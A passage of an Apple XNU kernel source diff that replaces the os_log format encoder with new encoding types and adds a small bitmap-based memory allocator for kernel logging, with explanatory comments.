-
-               _os_log_parse_annotated(context->annotated, &visibility, NULL, NULL);
-               if (visibility) {
-                       if (!strcasecmp(visibility, "private")) {
-                               content->flags |= OS_LOG_CONTENT_FLAG_PRIVATE;
-                       } else if (!strcasecmp(visibility, "public")) {
-                               content->flags &= ~OS_LOG_CONTENT_FLAG_PRIVATE;
-                       }
-               }
-
-               context->annotated = NULL;
-       }
-#endif /* !KERNEL */
-
-       switch (ctype) {
-       case OS_LOG_BUFFER_VALUE_TYPE_COUNT:
-       case OS_LOG_BUFFER_VALUE_TYPE_SCALAR:
-               if (is_private) {
-                       _encode_data(content, tempString, strlen(tempString) + 1, context);
-               } else {
-                       if ((context->content_off + content_sz) > context->content_sz) {
-                               return false;
-                       }
-
-                       memcpy(content->value, arg, arg_len);
-                       content->size = (uint8_t)arg_len;
-                       context->content_off += content_sz;
-               }
-               break;
-
-       case OS_LOG_BUFFER_VALUE_TYPE_STRING:
-               context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR;
-               if (_os_log_string_is_public(arg)) {
-                       content->flags &= ~OS_LOG_CONTENT_FLAG_PRIVATE;
-               }
-
-               _encode_data(content, arg, arg_len, context);
-               break;
-
-#ifndef KERNEL
-       case OS_LOG_BUFFER_VALUE_TYPE_POINTER:
-               context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR;
-               _encode_data(content, arg, arg_len, context);
-               break;
-
-       case OS_LOG_BUFFER_VALUE_TYPE_OBJECT:
-               context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR;
-               if (!_NSCF2data(arg, tempString, sizeof(tempString), &obj_private)) {
-                       tempString[0] = '\0';
-               }
-
-               if (!obj_private) {
-                       content->flags &= ~OS_LOG_CONTENT_FLAG_PRIVATE;
-               }
-
-               _encode_data(content, tempString, strlen(tempString) + 1, context);
-               break;
-#endif /* !KERNEL */
-       }
-
-       if (content->flags & OS_LOG_CONTENT_FLAG_PRIVATE) {
-               context->buffer->flags |= OS_LOG_BUFFER_HAS_PRIVATE;
-       }
-
-       context->arg_idx++;
-
-       return true;
-}
-
-static bool
-_os_log_encode(const char *format, va_list args, int saved_errno, os_log_buffer_context_t context)
-{
-       const char *percent = strchr(format, '%');
-#ifndef KERNEL
-       char annotated[256];
-#endif
-
-       while (percent != NULL) {
-               ++percent;
-               if (percent[0] != '%') {
-                       struct os_log_format_value_s value;
-                       int     type = OST_INT;
-#ifndef KERNEL
-                       bool    long_double = false;
-#endif
-                       int     prec = 0;
-                       char    ch;
-
-                       for (bool done = false; !done; percent++) {
-                               switch (ch = percent[0]) {
-                               /* type of types or other */
-                               case 'l': // longer
-                                       type++;
-                                       break;
-
-                               case 'h': // shorter
-                                       type--;
-                                       break;
-
-                               case 'z':
-                                       type = OST_SIZE;
-                                       break;
-
-                               case 'j':
-                                       type = OST_INTMAX;
-                                       break;
-
-                               case 't':
-                                       type = OST_PTRDIFF;
-                                       break;
-
-                               case '.': // precision
-                                       if ((percent[1]) == '*') {
-                                               prec = va_arg(args, int);
-                                               _os_log_encode_arg(&prec, sizeof(prec), OS_LOG_BUFFER_VALUE_TYPE_COUNT, false, context);
-                                               percent++;
-                                               continue;
-                                       } else {
-                                               // we have to read the precision and do the right thing
-                                               const char *fmt = percent + 1;
-                                               prec = 0;
-                                               while (isdigit(ch = *fmt++)) {
-                                                       prec = 10 * prec + (ch - '0');
-                                               }
-
-                                               if (prec > 1024) {
-                                                       prec = 1024;
-                                               }
-
-                                               _os_log_encode_arg(&prec, sizeof(prec), OS_LOG_BUFFER_VALUE_TYPE_COUNT, false, context);
-                                       }
-                                       break;
-
-                               case '-': // left-align
-                               case '+': // force sign
-                               case ' ': // prefix non-negative with space
-                               case '#': // alternate
-                               case '\'': // group by thousands
-                                       break;
-
-                               /* fixed types */
-                               case 'd': // integer
-                               case 'i': // integer
-                               case 'o': // octal
-                               case 'u': // unsigned
-                               case 'x': // hex
-                               case 'X': // upper-hex
-                                       switch (type) {
-                                       case OST_CHAR:
-                                               value.type.ch = (char) va_arg(args, int);
-                                               _os_log_encode_arg(&value.type.ch, sizeof(value.type.ch), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       case OST_SHORT:
-                                               value.type.s = (short) va_arg(args, int);
-                                               _os_log_encode_arg(&value.type.s, sizeof(value.type.s), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       case OST_INT:
-                                               value.type.i = va_arg(args, int);
-                                               _os_log_encode_arg(&value.type.i, sizeof(value.type.i), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       case OST_LONG:
-                                               value.type.l = va_arg(args, long);
-                                               _os_log_encode_arg(&value.type.l, sizeof(value.type.l), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       case OST_LONGLONG:
-                                               value.type.ll = va_arg(args, long long);
-                                               _os_log_encode_arg(&value.type.ll, sizeof(value.type.ll), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       case OST_SIZE:
-                                               value.type.z = va_arg(args, size_t);
-                                               _os_log_encode_arg(&value.type.z, sizeof(value.type.z), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       case OST_INTMAX:
-                                               value.type.im = va_arg(args, intmax_t);
-                                               _os_log_encode_arg(&value.type.im, sizeof(value.type.im), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       case OST_PTRDIFF:
-                                               value.type.pd = va_arg(args, ptrdiff_t);
-                                               _os_log_encode_arg(&value.type.pd, sizeof(value.type.pd), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                               break;
-
-                                       default:
-                                               return false;
-                                       }
-                                       done = true;
-                                       break;
-
-#ifndef KERNEL
-                               case '{':
-                                       // we do not support this for shimmed code
-                                       if (context->shimmed) {
-                                               return false;
-                                       }
-
-                                       for (const char *curr2 = percent + 1; (ch = (*curr2)) != NUL; curr2++) {
-                                               if (ch == '}') {
-                                                       strlcpy(annotated, percent, MIN(curr2 - (percent + 1), sizeof(annotated)));
-                                                       context->annotated = annotated;
-                                                       percent = curr2;
-                                                       break;
-                                               }
-                                       }
-                                       break;
-#endif /* !KERNEL */
-
-                               case 'p': // pointer
-                                       value.type.p = va_arg(args, void *);
-                                       _os_log_encode_arg(&value.type.p, sizeof(value.type.p), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                       done = true;
-                                       break;
-
-#ifndef KERNEL
-                               case 'P': // pointer data
-                                       if (context->shimmed) { // we do not support this for shimmed code
-                                               return false;
-                                       }
-
-                                       context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR;
-                                       value.type.p = va_arg(args, void *);
-
-                                       // capture the string pointer to generate a symptom
-                                       if (context->log && context->log->generate_symptoms && context->arg_idx == 1 && value.type.pch && prec) {
-                                               context->symptom_ptr = value.type.p;
-                                               context->symptom_ptr_len = prec;
-                                       }
-
-                                       _os_log_encode_arg(value.type.p, prec, OS_LOG_BUFFER_VALUE_TYPE_POINTER, false, context);
-                                       prec = 0;
-                                       done = true;
-                                       break;
-#endif /* !KERNEL */
-
-#ifndef KERNEL
-                               case 'L': // long double
-                                       long_double = true;
-                                       break;
-
-                               case 'a': case 'A': case 'e': case 'E': // floating types
-                               case 'f': case 'F': case 'g': case 'G':
-                                       if (long_double) {
-                                               value.type.ld = va_arg(args, long double);
-                                               _os_log_encode_arg(&value.type.ld, sizeof(value.type.ld), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                       } else {
-                                               value.type.d = va_arg(args, double);
-                                               _os_log_encode_arg(&value.type.d, sizeof(value.type.d), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                       }
-                                       done = true;
-                                       break;
-#endif /* !KERNEL */
-
-                               case 'c': // char
-                                       value.type.ch = (char) va_arg(args, int);
-                                       _os_log_encode_arg(&value.type.ch, sizeof(value.type.ch), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                       done = true;
-                                       break;
-
-#ifndef KERNEL
-                               case 'C': // wide-char
-                                       value.type.wch = va_arg(args, wint_t);
-                                       _os_log_encode_arg(&value.type.wch, sizeof(value.type.wch), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                       done = true;
-                                       break;
-#endif /* !KERNEL */
-
-                               case 's': // string
-                                       value.type.pch = va_arg(args, char *);
-                                       if (!prec && value.type.pch != NULL) {
-                                               prec = (int) strlen(value.type.pch) + 1;
-                                       }
-
-#ifndef KERNEL
-                                       // capture the string pointer to generate a symptom
-                                       if (context->log && context->log->generate_symptoms && context->arg_idx == 0 && value.type.pch) {
-                                               context->symptom_str = value.type.pch;
-                                       }
-#endif
-
-                                       context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR;
-                                       _os_log_encode_arg(value.type.pch, prec, OS_LOG_BUFFER_VALUE_TYPE_STRING, false, context);
-                                       prec = 0;
-                                       done = true;
-                                       break;
-
-#ifndef KERNEL
-                               case 'S': // wide-string
-                                       value.type.pwch = va_arg(args, wchar_t *);
-                                       if (!prec && value.type.pwch != NULL) {
-                                               prec = (int) wcslen(value.type.pwch) + 1;
-                                       }
-
-                                       context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR;
-                                       _os_log_encode_arg(value.type.pwch, prec, OS_LOG_BUFFER_VALUE_TYPE_STRING, false, context);
-                                       prec = 0;
-                                       done = true;
-                                       break;
-#endif /* !KERNEL */
-
-#ifndef KERNEL
-                               case '@': // CFTypeRef aka NSObject *
-                                       context->buffer->flags |= OS_LOG_BUFFER_HAS_NON_SCALAR;
-                                       _os_log_encode_arg(va_arg(args, void *), 0, OS_LOG_BUFFER_VALUE_TYPE_OBJECT, false, context);
-                                       done = true;
-                                       break;
-#endif /* !KERNEL */
-
-                               case 'm':
-                                       value.type.i = saved_errno;
-                                       _os_log_encode_arg(&value.type.i, sizeof(value.type.i), OS_LOG_BUFFER_VALUE_TYPE_SCALAR, false, context);
-                                       done = true;
-                                       break;
-
-                               default:
-                                       if (isdigit(ch)) { // [0-9]
-                                               continue;
-                                       }
-                                       return false;
-                               }
-
-                               if (done) {
-                                       percent = strchr(percent, '%'); // Find next format
-                                       break;
-                               }
-                       }
-               } else {
-                       percent = strchr(percent + 1, '%'); // Find next format after %%
-               }
-       }
-
-       context->buffer->arg_cnt = context->arg_idx;
-       context->content_sz = context->content_off;
-       context->pubdata_sz = context->pubdata_off;
-       context->privdata_sz = context->privdata_off;
-       context->arg_idx = context->content_off = context->pubdata_off = context->privdata_off = 0;
-
-       return true;
-}
+void os_log_context_init(os_log_context_t, logmem_t *, uint8_t *, size_t);
+void os_log_context_free(os_log_context_t);
+bool os_log_context_encode(os_log_context_t, const char *, va_list, void *, void *, bool);
 
 #endif /* log_encode_h */
index ac4b44bdb41e480636801ec1e57c09e280acd37e..23a995bd1f9e0916f0aee940e438964d99e2d767 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2015-2016 Apple Inc. All rights reserved.
+ * Copyright (c) 2015-2020 Apple Inc. All rights reserved.
  *
  * @APPLE_LICENSE_HEADER_START@
  *
 #include <stdbool.h>
 #include <stddef.h>
 
+#include "log_mem.h"
+
 #pragma mark - buffer support structures, enums
 
-OS_ENUM(os_log_value_type, uint8_t,
-    OS_LOG_BUFFER_VALUE_TYPE_SCALAR = 0,
-    OS_LOG_BUFFER_VALUE_TYPE_COUNT = 1,
-    OS_LOG_BUFFER_VALUE_TYPE_STRING = 2,
-#ifndef KERNEL
-    OS_LOG_BUFFER_VALUE_TYPE_POINTER = 3,
-    OS_LOG_BUFFER_VALUE_TYPE_OBJECT = 4,
-#endif
+OS_ENUM(os_log_fmt_hdr_flags, uint8_t,
+    OSLF_HDR_FLAG_HAS_PRIVATE    = 0x01,
+    OSLF_HDR_FLAG_HAS_NON_SCALAR = 0x02,
+    );
+
+OS_ENUM(os_log_fmt_cmd_type, uint8_t,
+    OSLF_CMD_TYPE_SCALAR      = 0, // %u, %lld, %x, %p, %g, ...
+    OSLF_CMD_TYPE_COUNT       = 1, // %.16P, %.*s
+    OSLF_CMD_TYPE_STRING      = 2, // %s
+    OSLF_CMD_TYPE_POINTER     = 3, // %P
+    OSLF_CMD_TYPE_OBJECT      = 4, // %@
+    OSLF_CMD_TYPE_WIDE_STRING = 5, // %S
+    OSLF_CMD_TYPE_ERRNO       = 6, // %m
+    OSLF_CMD_TYPE_MASK        = 7, // %{mask.foo}...
     );
 
-OS_ENUM(os_log_value_subtype, uint8_t,
-    OS_LOG_BUFFER_VALUE_SUBTYPE_NONE = 0,
-    OS_LOG_BUFFER_VALUE_SUBTYPE_INTEGER = 1,
-#ifndef KERNEL
-    OS_LOG_BUFFER_VALUE_SUBTYPE_FLOAT = 2,
-#endif
+OS_ENUM(os_log_fmt_cmd_flags, uint8_t,
+    OSLF_CMD_FLAG_PRIVATE    = 0x1,
+    OSLF_CMD_FLAG_PUBLIC     = 0x2,
+    OSLF_CMD_FLAG_SENSITIVE  = 0x4 | OSLF_CMD_FLAG_PRIVATE,
     );
 
 enum os_log_int_types_t {
@@ -67,7 +73,7 @@ enum os_log_int_types_t {
        OST_PTRDIFF   =  5,
 };
 
-union os_log_format_types_u {
+union os_log_fmt_types_u {
        uint16_t    u16;
        uint32_t    u32;
        uint64_t    u64;
@@ -76,100 +82,53 @@ union os_log_format_types_u {
        int         i;
        void        *p;
        char        *pch;
-#ifndef KERNEL
-       wchar_t     wch;
-       wchar_t     *pwch;
-#endif
        size_t      z;
        intmax_t    im;
        ptrdiff_t   pd;
        long        l;
        long long   ll;
-#ifndef KERNEL
-       double      d;
-       float       f;
-       long double ld;
-#endif
 };
 
 typedef struct os_log_format_value_s {
-       union os_log_format_types_u type;
-       os_log_value_type_t ctype;
+       union os_log_fmt_types_u type;
+       os_log_fmt_cmd_type_t ctype;
        uint16_t size;
 } *os_log_format_value_t;
 
-#define OST_FORMAT_MAX_ARGS 48
-#ifdef KERNEL
-#define OST_FORMAT_MAX_STRING_SIZE 512
-#else
-#define OST_FORMAT_MAX_STRING_SIZE 1024
-#endif
-
-#define OST_FORMAT_NON_STATIC ~0
-
-typedef struct os_log_buffer_value_s {
-#define OS_LOG_CONTENT_FLAG_PRIVATE 0x1
-       uint8_t flags : 4;
-       os_log_value_type_t type : 4;
-       uint8_t size;
-       uint8_t value[];
-} *os_log_buffer_value_t;
-
-typedef struct os_log_buffer_s {
-#define OS_LOG_BUFFER_HAS_PRIVATE 0x1
-#define OS_LOG_BUFFER_HAS_NON_SCALAR 0x2
-       uint8_t flags;
-       uint8_t arg_cnt;
-       uint8_t content[];
-} *os_log_buffer_t;
-
-typedef struct os_log_buffer_context_s {
-       os_log_t log;
-       os_log_buffer_t buffer;
-       uint8_t *pubdata;
-       uint8_t *privdata;
-
-       // composed string
-       char *comp;
-       size_t comp_off;
-       size_t comp_sz;
-
-       // sizes and offsets
-       uint16_t content_off; // offset into buffer->content
-       uint16_t content_sz; // size not including the header
-       uint16_t pubdata_off;
-       uint16_t pubdata_sz;
-       uint16_t privdata_off;
-       uint16_t privdata_sz;
-
-       uint8_t arg_idx;
-
-       // if argument content was limited with %.* or %.#
-
-#ifndef KERNEL
-       const char *symptom_str;
-       const void *symptom_ptr;
-       uint16_t symptom_ptr_len;
-       char *annotated;
-#endif
-       int arg_content_sz;
-       bool need_size;
-       bool shimmed;
-} *os_log_buffer_context_t;
-
-typedef struct os_log_arginfo_s {
-       uint16_t offset;
-       uint16_t length;
-} *os_log_arginfo_t;
-
-/* Clients of these interfaces/structures may be expected to provide implementations of the following functions */
+typedef struct os_log_fmt_hdr_s {
+       os_log_fmt_hdr_flags_t hdr_flags;
+       uint8_t hdr_cmd_cnt;
+       uint8_t hdr_data[];
+} *os_log_fmt_hdr_t;
 
-#ifndef KERNEL
-extern bool
-_NSCF2data(const void *obj, char *string_value, size_t string_sz, bool *is_private);
-#endif
+typedef struct os_log_fmt_cmd_s {
+       os_log_fmt_cmd_flags_t cmd_flags : 4;
+       os_log_fmt_cmd_type_t cmd_type : 4;
+       uint8_t cmd_size;
+       uint8_t cmd_data[];
+} *os_log_fmt_cmd_t;
 
-extern bool
-_os_log_string_is_public(const char *str);
+typedef struct os_log_fmt_range_s {
+       uint16_t offset;
+       uint16_t length : 15;
+       uint16_t truncated : 1;
+} *os_log_fmt_range_t;
+
+#define OS_LOG_MAX_PUB_ARGS (32)
+
+typedef struct os_log_context_s {
+       logmem_t                    *ctx_logmem;
+       uint8_t                     *ctx_buffer;
+       size_t                      ctx_buffer_sz;
+       os_log_fmt_hdr_t            ctx_hdr;
+       char                        *ctx_pubdata[OS_LOG_MAX_PUB_ARGS];
+       uint16_t                    ctx_content_off; // offset into buffer->hdr_data
+       uint16_t                    ctx_content_sz; // size not including the header
+       uint16_t                    ctx_pubdata_sz;
+       uint16_t                    ctx_pubdata_cnt;
+       firehose_tracepoint_flags_t ctx_ft_flags;
+       uint8_t                     ctx_truncated : 1;
+       uint8_t                     ctx_allocated : 1;
+} *os_log_context_t;
 
 #endif /* log_encode_types_h */
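
For orientation, the encoding that log_encode.c produces with these types is, after the tracepoint location bytes, a small header followed by one command per argument, with string payloads appended after the command list. Purely as an illustration (not part of the header), a format string such as "%d %s" with the arguments 42 and "disk0" ends up laid out roughly as:

/*
 * hdr:   hdr_flags = OSLF_HDR_FLAG_HAS_NON_SCALAR, hdr_cmd_cnt = 2
 * cmd 0: cmd_type = OSLF_CMD_TYPE_SCALAR, cmd_flags = OSLF_CMD_FLAG_PUBLIC,
 *        cmd_size = 4, cmd_data = the value 42 stored inline
 * cmd 1: cmd_type = OSLF_CMD_TYPE_STRING, cmd_flags = OSLF_CMD_FLAG_PUBLIC,
 *        cmd_size = sizeof(struct os_log_fmt_range_s),
 *        cmd_data = { .offset = 0, .length = 6 }   -- a range into the public data
 * pubdata (appended after the last command): "disk0\0"
 */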
diff --git a/libkern/os/log_mem.c b/libkern/os/log_mem.c
new file mode 100644 (file)
index 0000000..311082b
--- /dev/null
@@ -0,0 +1,217 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this
+ * file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_LICENSE_HEADER_END@
+ */
+
+#include <stdbool.h>
+#include <stdint.h>
+#include <kern/assert.h>
+#include <kern/locks.h>
+#include <os/atomic_private.h>
+
+#include "log_mem.h"
+
+#define BLOCK_INVALID ((size_t)-1)
+#define BLOCK_LEVEL_BASE(level) ((1 << (level)) - 1)
+#define BLOCK_SIZE(level) (1 << (level))
+#define BLOCK_PARENT(b) (((b) % 2 == 0) ? ((b) >> 1) - 1 : ((b) >> 1))
+#define BLOCK_LCHILD(b) (((b) << 1) + 1)
+#define BLOCK_BUDDY(b) (((b) & 0x1) ? (b) + 1 : (b) - 1)
+#define BLOCK_INDEX(lm, l, a, s) \
+    (BLOCK_LEVEL_BASE(l) + ((uintptr_t)(a) - (uintptr_t)(lm)->lm_mem) / (s))
+
+#define BITMAP_BUCKET_SIZE (8 * sizeof(((logmem_t *)0)->lm_mem_map[0]))
+#define BITMAP_BUCKET(i) ((i) / BITMAP_BUCKET_SIZE)
+#define BITMAP_BIT(i) (1 << (BITMAP_BUCKET_SIZE - ((i) % BITMAP_BUCKET_SIZE) - 1))
+
+static bool
+bitmap_get(logmem_t *lm, size_t block)
+{
+       return lm->lm_mem_map[BITMAP_BUCKET(block)] & BITMAP_BIT(block);
+}
+
+static void
+bitmap_set(logmem_t *lm, size_t block)
+{
+       lm->lm_mem_map[BITMAP_BUCKET(block)] |= BITMAP_BIT(block);
+}
+
+static void
+bitmap_clear(logmem_t *lm, size_t block)
+{
+       lm->lm_mem_map[BITMAP_BUCKET(block)] &= ~BITMAP_BIT(block);
+}
+
+static void
+bitmap_reserve_root(logmem_t *lm, size_t block)
+{
+       const size_t top_block = BLOCK_LEVEL_BASE(lm->lm_cap_order - lm->lm_max_order);
+
+       for (ssize_t next = BLOCK_PARENT(block); next >= top_block; next = BLOCK_PARENT(next)) {
+               /*
+                * If the rest of the root path is already marked as
+                * allocated we are done.
+                */
+               if (bitmap_get(lm, next)) {
+                       break;
+               }
+               bitmap_set(lm, next);
+       }
+}
+
+static void
+bitmap_release_root(logmem_t *lm, size_t block)
+{
+       const size_t top_block = BLOCK_LEVEL_BASE(lm->lm_cap_order - lm->lm_max_order);
+       int buddy_allocated = 0;
+
+       while (block > top_block) {
+               buddy_allocated = bitmap_get(lm, BLOCK_BUDDY(block));
+               block = BLOCK_PARENT(block);
+               /*
+                * If there is another allocation within the parent subtree
+                * in place we cannot mark the rest of the root path as free.
+                */
+               if (buddy_allocated) {
+                       break;
+               }
+               bitmap_clear(lm, block);
+       }
+}
+
+static void
+bitmap_update_subtree(logmem_t *lm, size_t level, size_t block, void (*fun)(logmem_t *, size_t))
+{
+       const size_t lcount = lm->lm_cap_order - lm->lm_min_order - level + 1;
+
+       for (size_t l = 0, n = 1; l < lcount; l++, n <<= 1) {
+               for (int i = 0; i < n; i++) {
+                       fun(lm, block + i);
+               }
+               block = BLOCK_LCHILD(block);
+       }
+}
+
+static void
+bitmap_release_subtree(logmem_t *lm, size_t level, size_t block)
+{
+       bitmap_update_subtree(lm, level, block, bitmap_clear);
+}
+
+static void
+bitmap_reserve_subtree(logmem_t *lm, size_t level, size_t block)
+{
+       bitmap_update_subtree(lm, level, block, bitmap_set);
+}
+
+static size_t
+block_size_level(logmem_t *lm, size_t amount)
+{
+       for (size_t l = lm->lm_min_order; l <= lm->lm_max_order; l++) {
+               if (amount <= BLOCK_SIZE(l)) {
+                       return lm->lm_cap_order - l;
+               }
+       }
+       return BLOCK_INVALID;
+}
+
+static size_t
+block_locate(logmem_t *lm, void *addr, size_t amount, size_t *block)
+{
+       size_t level = block_size_level(lm, amount);
+       if (level != BLOCK_INVALID) {
+               *block = BLOCK_INDEX(lm, level, addr, amount);
+       }
+       return level;
+}
+
+static size_t
+block_reserve(logmem_t *lm, size_t level)
+{
+       assert(level != BLOCK_INVALID);
+
+       const size_t base = BLOCK_LEVEL_BASE(level);
+       const size_t end = base + BLOCK_SIZE(level);
+
+       lck_spin_lock(lm->lm_lock);
+       for (size_t block = base; block < end; block++) {
+               if (!bitmap_get(lm, block)) {
+                       bitmap_reserve_root(lm, block);
+                       bitmap_reserve_subtree(lm, level, block);
+                       lck_spin_unlock(lm->lm_lock);
+                       return block - base;
+               }
+       }
+       lck_spin_unlock(lm->lm_lock);
+
+       return BLOCK_INVALID;
+}
+
+void *
+logmem_alloc(logmem_t *lm, size_t *amount)
+{
+       assert(amount);
+
+       os_atomic_inc(&lm->lm_cnt_allocations, relaxed);
+
+       if (*amount == 0 || *amount > BLOCK_SIZE(lm->lm_max_order)) {
+               os_atomic_inc(&lm->lm_cnt_failed_size, relaxed);
+               return NULL;
+       }
+
+       size_t level = block_size_level(lm, *amount);
+       size_t block = block_reserve(lm, level);
+
+       if (block == BLOCK_INVALID) {
+               os_atomic_inc(&lm->lm_cnt_failed_full, relaxed);
+               return NULL;
+       }
+
+       *amount = BLOCK_SIZE(lm->lm_cap_order - level);
+       os_atomic_sub(&lm->lm_cnt_free, (uint32_t)*amount, relaxed);
+
+       return &lm->lm_mem[block * *amount];
+}
+
+void
+logmem_free(logmem_t *lm, void *addr, size_t amount)
+{
+       assert(addr);
+       assert(amount > 0 && ((amount & (amount - 1)) == 0));
+
+       size_t block = BLOCK_INVALID;
+       size_t level = block_locate(lm, addr, amount, &block);
+       assert(level != BLOCK_INVALID);
+       assert(block != BLOCK_INVALID);
+
+       lck_spin_lock(lm->lm_lock);
+       bitmap_release_root(lm, block);
+       bitmap_release_subtree(lm, level, block);
+       lck_spin_unlock(lm->lm_lock);
+
+       os_atomic_add(&lm->lm_cnt_free, (uint32_t)amount, relaxed);
+}
+
+size_t
+logmem_max_size(const logmem_t *lm)
+{
+       return BLOCK_SIZE(lm->lm_max_order);
+}
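
The bitmap is a heap-ordered binary tree over the byte array, and the BLOCK_* macros are the usual parent/child/buddy index arithmetic. A worked example with a hypothetical configuration of lm_cap_order = 10 (a 1 KiB region), lm_min_order = 5 and lm_max_order = 9:

/*
 * A 100-byte request rounds up to a 128-byte block (order 7), so
 * level = lm_cap_order - 7 = 3. That level starts at
 * BLOCK_LEVEL_BASE(3) = (1 << 3) - 1 = 7 and holds BLOCK_SIZE(3) = 8
 * blocks (indices 7..14). If index 9 is the first free bit,
 * block_reserve() sets bit 9, then bitmap_reserve_root() walks
 * BLOCK_PARENT(9) = 4 and BLOCK_PARENT(4) = 1 (the top allocatable
 * level starts at BLOCK_LEVEL_BASE(lm_cap_order - lm_max_order) = 1),
 * while bitmap_reserve_subtree() marks index 9's entire subtree down
 * to the minimum block size. logmem_alloc() then returns
 * &lm_mem[(9 - 7) * 128] = lm_mem + 256 and sets *amount = 128.
 */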
diff --git a/libkern/os/log_mem.h b/libkern/os/log_mem.h
new file mode 100644 (file)
index 0000000..d29ca2b
--- /dev/null
@@ -0,0 +1,84 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this
+ * file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_LICENSE_HEADER_END@
+ */
+
+#ifndef log_mem_h
+#define log_mem_h
+
+#include <stddef.h>
+#include <stdint.h>
+
+/*
+ * A simple allocator on top of a plain byte array. Primarily intended to
+ * support OS kernel logging without introducing a dependency on the VM
+ * subsystem.
+ */
+typedef struct logmem_s {
+       lck_spin_t *lm_lock;
+       uint8_t     *lm_mem;
+       uint8_t     *lm_mem_map;
+       size_t      lm_cap_order;
+       size_t      lm_min_order;
+       size_t      lm_max_order;
+       uint32_t    lm_cnt_allocations;
+       uint32_t    lm_cnt_failed_size;
+       uint32_t    lm_cnt_failed_full;
+       uint32_t    lm_cnt_free;
+} logmem_t;
+
+/*
+ * Static initializer for global instances of logmem. The size order defines
+ * the total amount of logmem memory; the min and max orders set the minimum
+ * and maximum sizes, respectively, of the blocks allocatable from the given
+ * logmem. Local or dynamically allocated instances of logmem should not be
+ * initialized by this macro.
+ */
+#define LOGMEM_STATIC_INIT(name, size_order, min_order, max_order) \
+    SIMPLE_LOCK_DECLARE(name##_lck, 0); \
+    logmem_t name = { \
+       .lm_lock = (lck_spin_t *)&name##_lck, \
+       .lm_mem = (uint8_t[(1 << (size_order))]){ 0 }, \
+       .lm_mem_map = (uint8_t[MAX(1, (1 << ((size_order) - (min_order) + 1)) / 8)]){ 0 }, \
+       .lm_cap_order = (size_order), \
+       .lm_max_order = (max_order), \
+       .lm_min_order = (min_order), \
+       .lm_cnt_free = (1 << (size_order)) \
+    };
+
+/*
+ * Allocates memory from the given logmem. Returns a pointer to the beginning
+ * of the allocated block and updates the size argument with the resulting
+ * block size, which is equal to or greater than the size requested.
+ */
+void *logmem_alloc(logmem_t *, size_t *);
+
+/*
+ * Frees memory previously allocated by logmem_alloc(). The caller must call
+ * logmem_free() with the exact pointer and size values returned by
+ * logmem_alloc().
+ */
+void logmem_free(logmem_t *, void *, size_t);
+
+/*
+ * Returns the maximum memory size allocatable by the logmem.
+ */
+size_t logmem_max_size(const logmem_t *);
+
+#endif /* log_mem_h */
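A minimal usage sketch of the interface declared above (the arena name and
orders here are hypothetical, and the block sizes are assumed to be the
powers of two implied by the orders):

/* Hypothetical arena: 2^14 bytes total, blocks between 2^5 and 2^10 bytes. */
LOGMEM_STATIC_INIT(log_arena, 14, 5, 10);

static void
log_arena_example(void)
{
	size_t size = 100;                          /* in: requested, out: granted */
	void *buf = logmem_alloc(&log_arena, &size);

	if (buf != NULL) {
		/* size is now rounded up to the block size, here 128 bytes */
		logmem_free(&log_arena, buf, size); /* pass back the exact pointer and size */
	}
}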
index 8385a23d104e8d822caa509647c031a45bfa8aca..cd0ddceacd500bf6df415edcdc1d5512f34ddf43 100644 (file)
@@ -40,8 +40,9 @@
  * Sign a blob of data with the GA key
  *
  */
+__attribute__((noinline))
 ptrauth_generic_signature_t
-ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags)
